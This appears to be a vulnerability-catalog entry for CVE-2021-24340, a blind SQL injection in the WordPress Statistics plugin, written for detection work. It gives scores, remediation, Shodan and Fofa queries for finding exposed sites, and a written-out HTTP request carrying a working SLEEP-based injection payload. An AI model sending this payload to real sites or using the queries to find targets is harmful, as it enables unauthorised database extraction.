🔙 목록으로 돌아가기

CVE-2021-24340: WordPress Statistics <13.0.8 - Blind SQL Injection

TitleWordPress Statistics <13.0.8 - Blind SQL Injection
Authorlotusdll,j4vaovo
SeverityHigh
ImpactUnauthenticated attackers can extract database contents via time-based blind SQL injection, potentially exposing sensitive WordPress configuration and user data.
RemediationUpdate to WordPress Statistics plugin version 13.0.8 or later to mitigate the vulnerability.
CVSS Score7.5
EPSS Score0.8326
CVE IDCVE-2021-24340
CWE IDCWE-89
Shodan Queryhttp.html:/wp-content/plugins/wp-statistics/
Fofa Querybody=/wp-content/plugins/wp-statistics/
Tags time-based-sqli cve2021 cve wp-plugin unauth wpscan wordpress sqli blind edb veronalabs vuln

🔍 Vulnerability Description

WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability.

🌐 HTTP Request

GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-en) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Connection: close
Accept-Encoding: gzip
GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24340.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-24340.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A